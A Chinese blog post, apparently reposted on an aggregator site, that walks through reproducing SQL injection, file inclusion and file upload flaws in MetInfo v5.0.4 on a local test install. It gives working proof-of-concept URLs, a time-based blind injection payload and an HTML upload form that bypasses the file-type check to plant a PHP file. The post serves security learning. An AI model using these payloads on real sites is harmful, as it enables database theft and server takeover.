日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

metinfov5.0.4漏洞复现

發布時間:2024/1/23 编程问答 23 豆豆
生活随笔 收集整理的這篇文章主要介紹了 metinfov5.0.4漏洞复现 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

metinfov5.0.4漏洞復現

最近學習,metinfov5.0.4漏洞復現,個人感覺這次的漏洞還是比較有意思的,為什么呢?原因是這次的3個漏洞都跟一個漏洞有關,這個漏洞就是變量覆蓋覆蓋漏洞.
簡單講就是用戶傳進去的值變成了一個新的變量覆蓋了原代碼的變量,從而被我們利用.
產生的原因是因為編程人員在進行變量傳值時,使用了雙(“$$”)符號 .

下面開始漏洞復現

測試環境:
phpstudy #一個集成環境包含php+mysql
php源碼(cms)
metinfov5.0.4 #源碼大家可以去網上下載

測試目標:
三個經典漏洞:
SQLi(注入)
文件包含
文件上傳

漏洞位置:
SQLi 注入漏洞位置:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22

POC:
http://localhost/metinfoV5.0.4/about/show.php?lang=cn&id=22 and if(ord(substr(database(),1,1))=109,sleep(5),0) –+

此處采用盲注,POC的語句解釋為,首先獲取數據庫名稱,然后截取第一個字符,將截取到的字符轉換為ASCII碼與猜想的ASCII碼做比較,如果滿足條件,也是說我們猜想正確,沉睡5秒,以此來爆出庫名,之后以此類推,爆表,字段,內容等等,當我們得到第一個字符后,我們可以進入數據庫和我們的庫名進行比較,發現第一個字符一致,證明注入成功.

文件包含漏洞位置:
http://localhost/metinfoV5.0.4/about/index.php

POC: http://localhost/metinfoV5.0.4/about/index.php?fmodule=7&module=../../phpinfo.php

為了幫助我們更好的理解,我們可以先在www目錄下寫一個phpinfo.php的文件,接著使用文件包含進行打開,發現成功打開,證明了此處存在文件包含漏洞.

文件上傳漏洞位置:
http://localhost/metinfoV5.0.4/admin/include/uploadify.php

POC:
http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp

為了便于利用,我們把它寫成一個HTML文件:

<meta charset="utf-8"> <form enctype="multipart/form-data"method="post"name="myfrom"action="http://localhost/MetInfoV5.0.4/admin/include/uploadify.php?tablepre=xx&met_lang=met_lang&lang=cn&met_admin_table=met_admin_table%20where%20usertype=3%23&metinfo_admin_id=1&metinfo_admin_pass=2&type=upfile&met_file_format=jpg|pphphp" ><input name="Filedata" type="file" size=20><input type="submit" name="Submit" value="提交信息"> </form>

之后我們只要打開寫好的html文件選擇.php格式的文件上傳就可以了!上傳成功后,我們進入該網站的upload/file/目錄下,發現我們的上傳文件,證明,文件上傳漏洞實現.

到此,漏洞復現基本完成,剩下的就是漏洞產生的原因了,由于時間有限,就不一一分析原因了,大家有興趣的可以去分析源代碼,來找出產生的原因.

總結

以上是生活随笔為你收集整理的metinfov5.0.4漏洞复现的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。